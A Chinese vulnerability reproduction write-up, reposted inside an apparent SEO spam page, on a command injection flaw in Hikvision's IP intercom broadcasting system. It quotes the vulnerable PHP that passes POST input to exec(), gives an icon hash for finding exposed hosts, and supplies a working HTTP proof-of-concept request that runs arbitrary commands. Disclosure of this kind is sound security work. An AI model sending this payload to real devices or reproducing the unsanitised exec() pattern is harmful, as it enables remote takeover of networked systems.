当前位置: 首页 > news >正文

怎么给餐饮店做网站百度竞价推广专员

怎么给餐饮店做网站,百度竞价推广专员,百度引流推广费用多少,中装建设属于什么板块漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/ph…

漏洞介绍

海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
在这里插入图片描述

资产测绘

icon_hash=“-1830859634”
在这里插入图片描述

漏洞复现

查看漏洞关键代码:

header("Content-type: text/html; charset=GB2312");
$postData = $_POST['jsondata'];
if(isset($postData['ip']) && isset($postData['type'])){$type = $postData['type'];//类型$ip = $postData['ip'];//IP地址$arr = systemopr($type, $ip);$len = count($arr);for($i = 0; $i < $len; $i++){if(isset($arr[$i])){$arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8}}$after = json_encode($arr);//转换成jsonecho $after;
}function systemopr($type, $ip, $times=4){$info = array();     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){//linuxif($type == "0"){exec("ping -c $times $ip", $info);}else if($type == "1"){exec("traceroute -m $times -w 1 $ip", $info);}else{exec($ip, $info);}}else{//windowsif($type == "0"){exec("ping $ip -n $times", $info);}else if($type == "1"){exec("tracert -h $times -w 1000 $ip", $info);}else{exec($ip, $info);}}return $info;
}

可以发现当$postData['type']$postData['ip']存在值时,则会传入systemopr函数,通过exec()函数进行拼接命令执行,当$postData['type']等于0或1时,则代入指定代码段,执行指定命令。但$postData['type']参数值不等于0和1时,可以不考虑参数闭合,直接可以通过$postData['ip']执行任意命令。而且恰巧$postData['type']$postData['ip']的值都是POST传参可控的,导致我们可以执行任意系统命令。

POC如下:

POST /php/ping.php HTTP/1.1
Host: your_ip
Content-Length: 46
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: closejsondata%5Btype%5D=3&jsondata%5Bip%5D=ipconfig

在这里插入图片描述

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.spon.com.cn/

http://www.fp688.cn/news/155644.html

相关文章:

  • 建设大型网站怎样赢利网络营销的目的和意义
  • wordpress的商城网站制作公司信息流广告怎么投放
  • 柳市做网站建设手机优化助手下载
  • 合肥网站建设模板优秀的网络搜索引擎营销案例
  • 找个公司做网站需要注意什么条件百度官网下载安装到桌面上
  • 做外汇哪个网站看外国消息广东网站营销seo方案
  • 绵阳网站建设怎么做百度sem
  • 广告设计与制作的课程南宁seo排名首页
  • 网站优化排名易下拉技术百度热搜榜排行
  • 清远做网站seo搜资源的搜索引擎
  • 网络专业公司排行榜郑州seo外包公司哪家好
  • 公司网站需要服务器吗今天发生的重大新闻事件
  • 鲜花团购网站建设哈尔滨最新消息
  • 国产免费erp软件seo排名培训公司
  • 信息系网站建设开题报告书杭州旺道企业服务有限公司
  • 网站公安备案手续互动营销案例
  • b2b网站的盈利模式bt搜索引擎最好用的
  • 商城网站建设哪家好网站优化方案范文
  • 网站流量导入是什么意思全网搜索引擎
  • 好女人生活常识网站建设网页设计软件
  • 如何做一份企业网站安卓在线视频嗅探app
  • 免费1级做看网站怎么注册个人网站
  • 怎么用网站做调查表国内专业seo公司
  • 福建省网站备案用户注销宠物美容师宠物美容培训学校
  • 大气个人网站源码抖音关键词搜索指数
  • 创建企业网站经过哪些步骤seo搜索引擎优化课程
  • 伊犁网站建设百度网站排名seo
  • 做套现网站外贸seo站
  • 做公司的网站有哪些东西吗百度一下你就知道官网网页版
  • wordpress 社交seo网站的优化流程